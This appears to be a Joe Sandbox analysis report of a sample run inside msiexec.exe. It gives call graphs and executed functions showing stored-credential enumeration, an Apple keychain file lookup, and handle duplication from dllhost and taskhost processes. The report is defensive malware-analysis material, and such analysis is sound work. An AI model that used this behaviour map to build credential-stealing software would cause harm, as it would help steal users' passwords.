calls 40236->40239 40241 417055 40236->40241 40238 417075 40237->40238 40240 41707a 11 API calls 40237->40240 40238->40162 40239->40241 40240->40236 40241->40162 40242->40194 40243->40167 40244->40167 40245->40167 40246->40167 40247->40167 40248->40185 40249->40168 40250->40172 40251->40175 40252->40181 40253->40193 40259 415cfe 40254->40259 40263 415d23 40259->40263 40266 41628e 40259->40266 40260 4163ca 40273 416422 11 API calls 40260->40273 40262 416172 memset 40262->40263 40263->40260 40263->40262 40264 416422 10 API calls 40263->40264 40265 415cb9 10 API calls 40263->40265 40263->40266 40264->40263 40265->40263 40267 416520 40266->40267 40268 416527 40267->40268 40272 416574 40267->40272 40270 416544 40268->40270 40268->40272 40274 4156aa 11 API calls 40268->40274 40271 416561 memcpy 40270->40271 40270->40272 40271->40272 40272->40066 40273->40266 40274->40270 40296 41493c EnumResourceNamesW 37679 4287c1 37680 4287d2 37679->37680 37681 429ac1 37679->37681 37682 428818 37680->37682 37683 42881f 37680->37683 37703 425711 37680->37703 37693 425ad6 37681->37693 37749 415c56 11 API calls 37681->37749 37716 42013a 37682->37716 37744 420244 96 API calls 37683->37744 37687 4260dd 37743 424251 119 API calls 37687->37743 37689 4259da 37742 416760 11 API calls 37689->37742 37694 429a4d 37699 429a66 37694->37699 37700 429a9b 37694->37700 37697 422aeb memset memcpy memcpy 37697->37703 37745 415c56 11 API calls 37699->37745 37702 429a96 37700->37702 37747 416760 11 API calls 37700->37747 37748 424251 119 API calls 37702->37748 37703->37681 37703->37689 37703->37694 37703->37697 37704 4260a1 37703->37704 37712 4259c2 37703->37712 37715 425a38 37703->37715 37732 4227f0 memset memcpy 37703->37732 37733 422b84 15 API calls 37703->37733 37734 422b5d memset memcpy memcpy 37703->37734 37735 422640 13 API calls 37703->37735 37737 4241fc 11 API calls 37703->37737 37738 42413a 89 API calls 37703->37738 37741 415c56 11 API calls 37704->37741 37705 429a7a 37746 416760 11 API calls 37705->37746 37712->37693 37736 415c56 11 API calls 37712->37736 37715->37712 37739 422640 13 API calls 37715->37739 37740 4226e0 12 API calls 37715->37740 37717 42014c 37716->37717 37720 420151 37716->37720 37759 41e466 96 API calls 37717->37759 37719 420162 37719->37703 37720->37719 37721 4201b3 37720->37721 37722 420229 37720->37722 37723 4201b8 37721->37723 37724 4201dc 37721->37724 37722->37719 37725 41fd5e 85 API calls 37722->37725 37750 41fbdb 37723->37750 37724->37719 37729 4201ff 37724->37729 37756 41fc4c 37724->37756 37725->37719 37729->37719 37731 42013a 96 API calls 37729->37731 37731->37719 37732->37703 37733->37703 37734->37703 37735->37703 37736->37689 37737->37703 37738->37703 37739->37715 37740->37715 37741->37689 37742->37687 37743->37693 37744->37703 37745->37705 37746->37702 37747->37702 37748->37681 37749->37689 37751 41fbf8 37750->37751 37754 41fbf1 37750->37754 37764 41ee26 37751->37764 37755 41fc39 37754->37755 37774 4446ce 11 API calls 37754->37774 37755->37719 37760 41fd5e 37755->37760 37757 41ee6b 85 API calls 37756->37757 37758 41fc5d 37757->37758 37758->37724 37759->37720 37762 41fd65 37760->37762 37761 41fdab 37761->37719 37762->37761 37763 41fbdb 85 API calls 37762->37763 37763->37762 37765 41ee41 37764->37765 37766 41ee32 37764->37766 37775 41edad 37765->37775 37778 4446ce 11 API calls 37766->37778 37769 41ee3c 37769->37754 37772 41ee58 37772->37769 37780 41ee6b 37772->37780 37774->37755 37784 41be52 37775->37784 37778->37769 37779 41eb85 11 API calls 37779->37772 37781 41ee70 37780->37781 37782 41ee78 37780->37782 37837 41bf99 85 API calls 37781->37837 37782->37769 37785 41be6f 37784->37785 37786 41be5f 37784->37786 37792 41be8c 37785->37792 37816 418c63 memset memset 37785->37816 37815 4446ce 11 API calls 37786->37815 37788 41be69 37788->37769 37788->37779 37790 41bee7 37790->37788 37820 41a453 85 API calls 37790->37820 37792->37788 37792->37790 37793 41bf3a 37792->37793 37794 41bed1 37792->37794 37819 4446ce 11 API calls 37793->37819 37796 41bef0 37794->37796 37799 41bee2 37794->37799 37796->37790 37797 41bf01 37796->37797 37798 41bf24 memset 37797->37798 37800 41bf14 37797->37800 37817 418a6d memset memcpy memset 37797->37817 37798->37788 37805 41ac13 37799->37805 37818 41a223 memset memcpy memset 37800->37818 37804 41bf20 37804->37798 37806 41ac52 37805->37806 37807 41ac3f memset 37805->37807 37810 41ac6a 37806->37810 37821 41dc14 19 API calls 37806->37821 37808 41acd9 37807->37808 37808->37790 37812 41aca1 37810->37812 37822 41519d 37810->37822 37812->37808 37813 41acc0 memset 37812->37813 37814 41accd memcpy 37812->37814 37813->37808 37814->37808 37815->37788 37816->37792 37817->37800 37818->37804 37819->37790 37821->37810 37825 4175ed 37822->37825 37833 417570 SetFilePointer 37825->37833 37828 41760a ReadFile 37830 417637 37828->37830 37831 417627 GetLastError 37828->37831 37829 4151b3 37829->37812 37830->37829 37832 41763e memset 37830->37832 37831->37829 37832->37829 37834 4175b2 37833->37834 37835 41759c GetLastError 37833->37835 37834->37828 37834->37829 37835->37834 37836 4175a8 GetLastError 37835->37836 37836->37834 37837->37782 37838 417bc5 37840 417c61 37838->37840 37844 417bda 37838->37844 37839 417bf6 UnmapViewOfFile CloseHandle 37839->37839 37839->37844 37842 417c2c 37842->37844 37850 41851e 18 API calls 37842->37850 37844->37839 37844->37840 37844->37842 37845 4175b7 37844->37845 37846 4175d6 CloseHandle 37845->37846 37847 4175c8 37846->37847 37848 4175df 37846->37848 37847->37848 37849 4175ce Sleep 37847->37849 37848->37844 37849->37846 37850->37842 39755 4147f3 39758 414561 39755->39758 39757 414813 39759 41456d 39758->39759 39760 41457f GetPrivateProfileIntW 39758->39760 39763 4143f1 memset _itow WritePrivateProfileStringW 39759->39763 39760->39757 39762 41457a 39762->39757 39763->39762

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 357 40de74-40de78 356->357 358 40de65-40de6c 356->358 357->352 357->356 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 377 40dffd-40e006 372->377 375 40df08 373->375 376 40dfef-40dff2 CloseHandle 373->376 374->370 374->377 378 40df0b-40df10 375->378 376->372 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->376 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                          • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                          • API String ID: 708747863-3398334509
                                                                                                                                                                                                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                                          Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                          Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1690352074-0
                                                                                                                                                                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                          Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InfoSystemmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3558857096-0
                                                                                                                                                                                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                                          Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                          • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                            • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                            • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                          • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                          • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                          • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                          • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                          • API String ID: 2263259095-3798722523
                                                                                                                                                                                                          • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                                          Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                          • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                          • API String ID: 2744995895-28296030
                                                                                                                                                                                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                                          Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
